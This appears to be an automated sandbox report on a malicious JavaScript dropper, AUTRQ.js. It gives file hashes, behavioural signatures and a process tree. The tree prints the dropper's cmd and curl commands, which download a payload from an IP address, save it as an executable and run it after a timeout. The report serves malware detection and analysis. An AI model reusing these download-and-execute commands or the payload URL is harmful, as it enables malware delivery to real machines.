Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/02/2024, 14:50

General

  • Target

    AUTRQ.js

  • Size

    70KB

  • MD5

    86cd752de6b8469f660b052777131d69

  • SHA1

    9a950f59587199ec816a0a0f1405afc42f08332f

  • SHA256

    5f1b65c978f43fd29de2f84ad114ce222a86482912a60d52470dd68fa72d458e

  • SHA512

    e2fa891820cf81bdbfb429fd184ac2ffa595c8aa81da67550918e8cd857caf1bc3fd66199e3d39dd2da2077f8ce4462e687827abedd82cf6e5982097f5b1ea58

  • SSDEEP

    1536:w8H7bmzZ6Gh2hGEYsrwHL0PZ1fIqxiNj9FFsVq+2Ldspsnc3dJSZcQ/ky41mLFlp:Q

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\AUTRQ.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl http://103.124.105.147/KNaDVX/0.8431638488079246.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Windows\system32\curl.exe
        curl http://103.124.105.147/KNaDVX/0.8431638488079246.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
        3⤵
          PID:1360
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl 0.7250258419257134.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Windows\system32\curl.exe
          curl 0.7250258419257134.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
          3⤵
            PID:1552
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl 0.3178419526352806.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Windows\system32\curl.exe
            curl 0.3178419526352806.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
            3⤵
              PID:628
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl 0.5321798752740512.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Windows\system32\curl.exe
              curl 0.5321798752740512.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
              3⤵
                PID:1456
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl 0.5875869817762389.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1384
              • C:\Windows\system32\curl.exe
                curl 0.5875869817762389.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
                3⤵
                  PID:1528
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl 0.0530546855257662.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2908
                • C:\Windows\system32\curl.exe
                  curl 0.0530546855257662.dat --output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
                  3⤵
                    PID:4688
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 11 & C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe
                  2⤵
                  • Checks computer location settings
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1952
                  • C:\Windows\system32\timeout.exe
                    timeout 11
                    3⤵
                    • Delays execution with timeout.exe
                    PID:2744

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads